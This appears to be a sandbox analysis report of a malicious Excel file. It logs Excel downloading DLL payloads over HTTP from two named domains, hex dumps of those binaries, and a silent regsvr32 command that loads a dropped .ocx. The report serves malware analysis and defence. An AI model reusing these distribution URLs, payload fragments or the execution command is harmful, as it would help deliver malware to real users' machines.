4a 92 e1 53 06 f8 84 ef d5 f1 29 41 7c ea 93 e0 e3 fa 33 7c 72 11 1f 57 e0 7b b5 6e 2a
                                  Data Ascii: 1faa|S-=@"["TS,z+VE-UA@U@jZjUT;ODA5{s=sg=s33gL<^IQbI>i_>[:(wS/^Xx3/ye.\2ogy/|;k}h .m~\<Z2^Qf_F/a~Th]QH6E?(mh^m gO7+vBS#PamBSYmW?]Ys|s*k;,E(Jgg*_W|>pN9:!]NHm<,^hnJn!mtZSkgdu<[WCXn2~+um&H5AVC#o]F5l_vtUcjc^bsK.14#dj]w^}G"%jy}vEC-[W`B)MfW17vVVM_ 34;8Tc>5qKVEM.|JS)A|3|rW{n*
                                  May 23, 2022 09:50:06.527519941 CEST395INData Raw: d0 01 33 c5 32 2f eb 60 57 20 c5 87 88 e3 1a 81 a3 0f 71 cc 17 38 96 20 8e eb bd 8c 63 05 e0 58 26 70 44 fc 44 d7 8e fc 0f f5 ea 2f 6a cd ae 40 07 a6 73 16 92 d8 7b e1 76 75 56 c1 58 62 82 d0 2a 17 d1 20 e5 f5 d0 c5 3d 0b 43 45 de c2 d0 e4 6c 35
                                  Data Ascii: 32/`W q8 cX&pDD/j@s{vuVXb* =CEl5S='!9Yk0wO5SAVY{UMiwosoLShkEFGQprD_f@a{-(D={|uOf:=y=5 c@5A:qG|;f/
                                  May 23, 2022 09:50:06.527535915 CEST396INData Raw: 1e bb 73 f9 af e1 9a 72 80 7a 2d 49 83 7a 17 00 f4 ed 53 a7 fa c2 35 15 00 cd 1f 90 7d 51 b8 c6 0f d0 6a f7 a1 76 e1 9a 4a 80 8a cb e6 6c 0a d7 2c 45 4c 4f 7d aa 10 f8 0f a0 53 97 4c 05 da 57 03 74 c5 d4 6e bf 01 ff 01 34 f3 e2 c5 50 c7 2a 80 76
                                  Data Ascii: srz-IzS5}QjvJl,ELO}SLWtn4P*v=m?@uW_AZT[C6e-@Ob;/k~q\?1%<t+1s<pNR Lohm@o?*evu}z?lE:g
                                  May 23, 2022 09:50:06.527546883 CEST398INData Raw: ef 03 9f 8e 05 68 d9 c5 cf 6e 07 fe 03 e8 e2 71 57 c1 0c 51 08 d0 b3 17 74 be 07 f8 0f 71 fe f7 63 30 07 14 63 de de 5f 41 7b 4b 00 5a a9 7e 05 18 4c 05 a8 f1 64 3f c8 9c 52 07 ca 9c cf 60 d4 ce 00 68 fb 7b 27 5c 01 fc 07 d0 e4 ae ff 04 3e 9d 0d
                                  Data Ascii: hnqWQtqc0c_A{KZ~Ld?R`h{'\>=A4fco{R(.1Jn@D*?>wj3<io HzX|!n.)8u^xzY@I]e=ufM.hV
                                  May 23, 2022 09:50:06.527561903 CEST399INData Raw: c3 7a 8b 8f 85 35 36 ee 6a cf 79 61 26 e4 50 da c2 2a f5 ed f3 40 de 3b 00 3a 30 e0 44 90 75 2e 80 3e a8 5b 0e ba 59 1a 40 2b ba 3a ca 81 ff 00 ea d2 b7 3f 70 4e 06 40 4f cc 3c 67 1a f0 1f 40 d3 8f bb 05 7a a1 27 40 1f f7 c4 b5 95 17 a0 a5 25 8f
                                  Data Ascii: z56jya&P*@;:0Du.>[Y@+:?pN@O<g@z'@%\[LC=vVOXO:A;ft@b'4`tGmq]|#id:S@2?~6@EoQ}@gz
                                  May 23, 2022 09:50:06.527580023 CEST400INData Raw: b3 96 01 47 6c 05 a8 ff e2 63 60 56 6b c0 3a ae 3c 19 56 9a 3b 00 72 77 7f 04 5a d4 04 90 b7 31 00 32 67 4f 3b 94 98 9f 02 e7 ec 05 e8 d4 d3 db e0 fe 1f e2 b7 a9 00 d6 a1 fb db e1 8e c8 14 98 fd 0e 00 34 fd 0a 1c b5 07 01 7a e1 1f c7 c0 a8 fd 0c
                                  Data Ascii: Glc`Vk:<V;rwZ12gO;4z15?P0(r\zH3}W:P ]M@@GD`IEMwD?Q=Lm/G/b~$Px\=-xRyu
                                  May 23, 2022 09:50:06.527595043 CEST401INData Raw: 40 3c cb d3 7e 39 0b e5 d1 fc 43 36 14 1c 77 3f 67 57 b4 25 53 50 40 38 f7 df 04 f0 98 71 98 65 59 47 ed 7b c8 ab bd c8 f9 f0 3c 52 eb 5b 8c 31 4b 33 b4 4d 45 04 b4 1f b9 4b 7b 6a 0c 82 fe 2e da 0e 15 52 bc 8c 59 6e e0 2c 83 21 0b 89 4a ed 9c 31
                                  Data Ascii: @<~9C6w?gW%SP@8qeYG{<R[1K3MEK{j.RYn,!J15:o-J`~)(CLTT7mpjBsx!P|=6Lt_}5;5BG.Q8Gq]@N<a4@"@?Gnn(;9*jE16
                                  May 23, 2022 09:50:06.527611971 CEST402INData Raw: 39 65 32 30 0d 0a 64 fe ac 3a b4 8e 50 aa ce 6e a2 5f 1f cd 4c 95 46 40 31 7e 28 68 59 c8 f8 ea 09 f3 d4 5a 41 0b 08 43 9b 97 90 cf 11 3c 38 b7 a6 c1 4d e7 f5 32 54 e5 99 b5 3a bb 41 7c f8 64 19 21 ea 85 dc 68 2a 0e 67 90 57 34 21 72 91 21 65 34
                                  Data Ascii: 9e20d:Pn_LF@1~(hYZAC<8M2T:A|d!h*gW4!r!e4~<8Vq\Bt[G8:(ItpKGhhTLRtRC7I4Sei0(SA|#AU7~aTUEq@+9iyHw2 .60]K 1T,SRP
                                  May 23, 2022 09:50:06.527627945 CEST404INData Raw: b2 e7 45 14 70 7c 37 46 6a 39 f5 72 b4 21 b7 30 a5 59 59 40 c5 11 47 f4 c8 7d 62 6b 77 ed 7c bc 5d 13 58 aa 06 f9 ca 8e e2 cf 6f ad 2c 68 d9 be 8f 8c 96 c1 c2 6f e4 3e 58 a6 6d 9c 67 34 27 3a 02 12 d5 88 44 98 e1 8a 24 19 6a 4c 19 22 68 75 29 d4
                                  Data Ascii: Ep|7Fj9r!0YY@G}bkw|]Xo,ho>Xmg4':D$jL"hu)x3lgB/whAu'OVE+d-~h0Zj_ sEqlH6D+rcET8$&,$QxLKW [C3,_Se<'{h/k-T"fe
                                  May 23, 2022 09:50:06.556988955 CEST405INData Raw: 84 10 0f 84 2b df 94 03 e1 a3 99 e6 a1 a7 e7 6c cb 43 2c 95 4e fa 23 b9 62 9b 06 68 96 a7 f8 bb 0a 1c 58 85 51 43 45 2e d2 29 8b 45 76 67 e1 12 3b 8f c1 4f df 34 57 7d 37 57 dd b2 4f 56 3d db 52 75 29 9f e2 38 1d 4b f4 1e aa 74 29 fe 2e 46 1c d7
                                  Data Ascii: +lC,N#bhXQCE.)Evg;O4W}7WOV=Ru)8Kt).FY7Emq=\P3IQ~tT],t3CQybT(\jV1"]qS@I2i+yB1SAZ,tb=Hx}fR EC9}*3nC
                                  May 23, 2022 09:50:06.557030916 CEST407INData Raw: 87 79 b9 84 5b 1b fa fd ff a1 d6 da 5f 4d 44 b2 a5 f8 bf 68 ed e0 dd 89 05 3d 5f dc 4a 6b 81 13 14 77 cd bf 8c c6 88 06 14 87 0a bc d0 ea 57 cf e4 56 df f6 1b b7 fa 96 f8 56 4f 4c d6 ea bc b8 56 e7 4a b4 be 4f d2 9b bd cd ed 3b 36 ae 7d 98 65 44
                                  Data Ascii: y[_MDh=_JkwWVVOLVJO;6}eD,-i]-9KW%hy~A(U=!,HcA{$HgL4wgIYKbdU`K@dFN{<K]f,;9N'Lc$:~UNhOsJtiH.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.224917366.71.247.6880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  May 23, 2022 09:50:10.497107029 CEST646OUTGET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: stainedglassexpress.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:10.723124981 CEST648INHTTP/1.1 200 OK
                                  Date: Mon, 23 May 2022 07:50:10 GMT
                                  Server: Apache
                                  X-Powered-By: PHP/7.3.33
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 23 May 2022 07:50:10 GMT
                                  Content-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"
                                  Content-Transfer-Encoding: binary
                                  Set-Cookie: 628b3cb29fefc=1653292210; expires=Mon, 23-May-2022 07:51:10 GMT; Max-Age=60; path=/
                                  Last-Modified: Mon, 23 May 2022 07:50:10 GMT
                                  Content-Length: 371200
                                  X-Content-Type-Options: nosniff
                                  Vary: User-Agent
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEd{b" 5@P .text `.rdata4 @@.data7@.pdata@@.rsrc@@.reloc
                                  May 23, 2022 09:50:10.723170996 CEST649INData Raw: 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: @B
                                  May 23, 2022 09:50:10.723211050 CEST650INData Raw: 34 76 c7 45 c0 59 4d 91 08 c7 45 c4 22 42 51 61 c7 45 c8 3c ad 27 30 c7 45 cc 45 41 0f 25 c7 45 d0 a6 14 48 2b c7 45 d4 65 21 68 8f c7 45 d8 ac 1d 38 63 c7 45 dc 6a 53 0b 32 c7 45 e0 34 f8 f1 78 c7 45 e4 50 76 35 3d c7 45 e8 91 09 12 39 c7 45 ec
                                  Data Ascii: 4vEYME"BQaE<'0EEA%EH+Ee!hE8cEjS2E4xEPv5=E9E<]ElOE'L#EAE:PtE'N8E1>#JEuJE@,:E5uEPKEsE# E )E$Ee&E(r#E,4XE0AE4pE8$ /E<@"/E@$ED 5.EH
                                  May 23, 2022 09:50:10.723299026 CEST652INData Raw: c7 85 10 02 00 00 2d ec 7e 35 c7 85 14 02 00 00 fe 27 4e 58 c7 85 18 02 00 00 2b 38 30 5a c7 85 1c 02 00 00 b3 10 75 2a c7 85 20 02 00 00 67 28 25 22 c7 85 24 02 00 00 f1 35 75 33 c7 85 28 02 00 00 49 18 01 4d c7 85 2c 02 00 00 2f c9 17 01 c7 85
                                  Data Ascii: -~5'NX+80Zu* g(%"$5u3(IM,/046$-8p<R@;D$SHULAPlO)T'J:XA!\:-ZZ`'Npd%2[h0-RlAip
                                  May 23, 2022 09:50:10.723341942 CEST653INData Raw: e9 41 c7 85 28 04 00 00 11 2b e9 c1 c7 85 2c 04 00 00 43 13 da ee c7 85 30 04 00 00 3c 57 9e fd c7 85 34 04 00 00 64 49 d3 9f c7 85 38 04 00 00 43 76 da 42 c7 85 3c 04 00 00 7d 69 b2 c3 c7 85 40 04 00 00 69 42 7a 1e c7 85 44 04 00 00 b2 5e 13 9d
                                  Data Ascii: A(+,C0<W4dI8CvB<}i@iBzD^H-`LdPHT>tTX\6q`Qdlh6h;#l-p"mtHxd|6uzJ\
                                  May 23, 2022 09:50:10.723404884 CEST654INData Raw: e2 17 1f 4d c7 85 40 06 00 00 ec 9f 10 31 c7 85 44 06 00 00 64 55 62 a4 c7 85 48 06 00 00 74 c6 9b 0c c7 85 4c 06 00 00 1d bb 38 a5 c7 85 50 06 00 00 c1 29 61 28 c7 85 54 06 00 00 d3 be 14 25 c7 85 58 06 00 00 61 a6 a5 74 c7 85 5c 06 00 00 b7 cc
                                  Data Ascii: M@1DdUbHtL8P)a(T%Xat\`9"dahDltJMpV0tRyix`M|dW$BxDt6rn&.5%Y\?0,'
                                  May 23, 2022 09:50:10.723445892 CEST656INData Raw: 00 00 64 a7 14 b3 c7 85 58 08 00 00 18 70 50 32 c7 85 5c 08 00 00 0c 33 ba 42 c7 85 60 08 00 00 b2 d6 51 53 c7 85 64 08 00 00 3c e1 6c a3 c7 85 68 08 00 00 ba 80 81 3b c7 85 6c 08 00 00 ea 90 15 64 c7 85 70 08 00 00 b1 8c 80 55 c7 85 74 08 00 00
                                  Data Ascii: dXpP2\3B`QSd<lh;ldpUt&"xIH|ZpVV?x.>w NjI"WzA8#'4+k
                                  May 23, 2022 09:50:10.723483086 CEST657INData Raw: 6c 0a 00 00 b7 15 90 bd c7 85 70 0a 00 00 38 09 55 95 c7 85 74 0a 00 00 b6 0a ae 53 c7 85 78 0a 00 00 49 87 23 a5 c7 85 7c 0a 00 00 6f 52 50 e3 c7 85 80 0a 00 00 15 5c ab 86 48 8d 0d 01 f5 01 00 c7 85 84 0a 00 00 24 76 22 50 c7 85 88 0a 00 00 5b
                                  Data Ascii: lp8UtSxI#|oRP\H$v"P[8|PW?6Y"pvv++o(Rg~iC"syvA)3HuH"E3E3F
                                  May 23, 2022 09:50:10.723570108 CEST659INData Raw: 08 48 0f c3 51 10 48 83 c1 40 48 0f c3 51 d8 48 0f c3 51 e0 49 ff c9 48 0f c3 51 e8 48 0f c3 51 f0 48 0f c3 51 f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad
                                  Data Ascii: HQH@HQHQIHQHQHQu$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;s
                                  May 23, 2022 09:50:10.723608971 CEST660INData Raw: 00 00 48 8b 4c 24 78 48 8b 00 48 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48
                                  Data Ascii: HL$xHH+HD$hH$H@8H$H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|
                                  May 23, 2022 09:50:10.848329067 CEST662INData Raw: 8b 44 24 30 48 c7 40 08 ff ff ff ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc
                                  Data Ascii: D$0H@HHH(=%rtrrRH(HT$HL$H(HD$0HvHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/T


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.2249174107.189.3.3980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  May 23, 2022 09:50:16.716734886 CEST1041OUTGET /images/D4TRnDubF/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: milanstaffing.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:16.812772036 CEST1043INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  x-powered-by: PHP/7.0.33
                                  set-cookie: 628b3cb8b9778=1653292216; expires=Mon, 23-May-2022 07:51:16 GMT; Max-Age=60; path=/
                                  cache-control: no-cache, must-revalidate
                                  pragma: no-cache
                                  last-modified: Mon, 23 May 2022 07:50:16 GMT
                                  expires: Mon, 23 May 2022 07:50:16 GMT
                                  content-type: application/x-msdownload
                                  content-disposition: attachment; filename="T35PENELLOsp.dll"
                                  content-transfer-encoding: binary
                                  content-length: 371200
                                  date: Mon, 23 May 2022 07:50:16 GMT
                                  server: LiteSpeed
                                  vary: User-Agent
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEd{b" 5@P .text `.rdata4 @@.data7@.pdata@@.rsrc@@.reloc@B
                                  May 23, 2022 09:50:16.812820911 CEST1044INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii:
                                  May 23, 2022 09:50:16.812838078 CEST1045INData Raw: c7 45 d4 65 21 68 8f c7 45 d8 ac 1d 38 63 c7 45 dc 6a 53 0b 32 c7 45 e0 34 f8 f1 78 c7 45 e4 50 76 35 3d c7 45 e8 91 09 12 39 c7 45 ec 1d 3c 5d 0e c7 45 f0 a5 6c 4f 0d c7 45 f4 27 4c 03 23 c7 45 f8 93 03 41 1d c7 45 fc 09 3a 50 74 c7 45 00 fe 27
                                  Data Ascii: Ee!hE8cEjS2E4xEPv5=E9E<]ElOE'L#EAE:PtE'N8E1>#JEuJE@,:E5uEPKEsE# E )E$Ee&E(r#E,4XE0AE4pE8$ /E<@"/E@$ED 5.EHAELPEP"_ET<3EX39E\x
                                  May 23, 2022 09:50:16.812851906 CEST1047INData Raw: 10 75 2a c7 85 20 02 00 00 67 28 25 22 c7 85 24 02 00 00 f1 35 75 33 c7 85 28 02 00 00 49 18 01 4d c7 85 2c 02 00 00 2f c9 17 01 c7 85 30 02 00 00 05 96 11 ef c7 85 34 02 00 00 36 24 12 2d c7 85 38 02 00 00 ee 70 95 0c c7 85 3c 02 00 00 0c 52 02
                                  Data Ascii: u* g(%"$5u3(IM,/046$-8p<R@;D$SHULAPlO)T'J:XA!\:-ZZ`'Npd%2[h0-RlAipN7#6tY&xV|
                                  May 23, 2022 09:50:16.812869072 CEST1048INData Raw: 00 64 49 d3 9f c7 85 38 04 00 00 43 76 da 42 c7 85 3c 04 00 00 7d 69 b2 c3 c7 85 40 04 00 00 69 42 7a 1e c7 85 44 04 00 00 b2 5e 13 9d c7 85 48 04 00 00 2d ce a9 60 c7 85 4c 04 00 00 64 1e ea 16 c7 85 50 04 00 00 88 48 ea da c7 85 54 04 00 00 c1
                                  Data Ascii: dI8CvB<}i@iBzD^H-`LdPHT>tTX\6q`Qdlh6h;#l-p"mtHxd|6uzJ\Ng(kjQCeM
                                  May 23, 2022 09:50:16.812887907 CEST1049INData Raw: 06 00 00 1d bb 38 a5 c7 85 50 06 00 00 c1 29 61 28 c7 85 54 06 00 00 d3 be 14 25 c7 85 58 06 00 00 61 a6 a5 74 c7 85 5c 06 00 00 b7 cc ae 8b c7 85 60 06 00 00 b7 13 39 22 c7 85 64 06 00 00 e7 0c 61 dc c7 85 68 06 00 00 97 ff 9c 44 c7 85 6c 06 00
                                  Data Ascii: 8P)a(T%Xat\`9"dahDltJMpV0tRyix`M|dW$BxDt6rn&.5%Y\?0,'aPKxI
                                  May 23, 2022 09:50:16.812906027 CEST1051INData Raw: 85 64 08 00 00 3c e1 6c a3 c7 85 68 08 00 00 ba 80 81 3b c7 85 6c 08 00 00 ea 90 15 64 c7 85 70 08 00 00 b1 8c 80 55 c7 85 74 08 00 00 e8 dc 26 22 c7 85 78 08 00 00 49 c4 12 48 c7 85 7c 08 00 00 d4 ec 01 5a c7 85 80 08 00 00 a6 af 70 56 c7 85 84
                                  Data Ascii: d<lh;ldpUt&"xIH|ZpVV?x.>w NjI"WzA8#'4+kAkD}LhH
                                  May 23, 2022 09:50:16.812922001 CEST1052INData Raw: a5 c7 85 7c 0a 00 00 6f 52 50 e3 c7 85 80 0a 00 00 15 5c ab 86 48 8d 0d 01 f5 01 00 c7 85 84 0a 00 00 24 76 22 50 c7 85 88 0a 00 00 5b e4 d0 38 c7 85 8c 0a 00 00 95 ff 98 16 c7 85 90 0a 00 00 da 7c 50 57 c7 85 94 0a 00 00 98 3f 36 8d c7 85 98 0a
                                  Data Ascii: |oRP\H$v"P[8|PW?6Y"pvv++o(Rg~iC"syvA)3HuH"E3E3FH$A@A0
                                  May 23, 2022 09:50:16.812939882 CEST1053INData Raw: f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad 00 00 00 e8 9e 54 00 00 85 c0 75 07 33 c0 e9 a9 01 00 00 e8 5e 09 00 00 85 c0 75 0c e8 f5 54 00 00 33 c0 e9 94
                                  Data Ascii: u$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk|$XuY=X~DP
                                  May 23, 2022 09:50:16.812958002 CEST1055INData Raw: 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48 89 44 24 40 48 8b 84 24 c8 00 00 00 8b 40 48 89 44 24 30 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 88 00
                                  Data Ascii: H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H3D$0HkH$DHD$x
                                  May 23, 2022 09:50:16.842438936 CEST1056INData Raw: 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 76 f7 01 00 48 89 88 a0 00 00 00 48 8b
                                  Data Ascii: (=%rtrrRH(HT$HL$H(HD$0HvHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL$8HHD$0HuH


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:09:50:12
                                  Start date:23/05/2022
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13fad0000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:3
                                  Start time:09:50:22
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
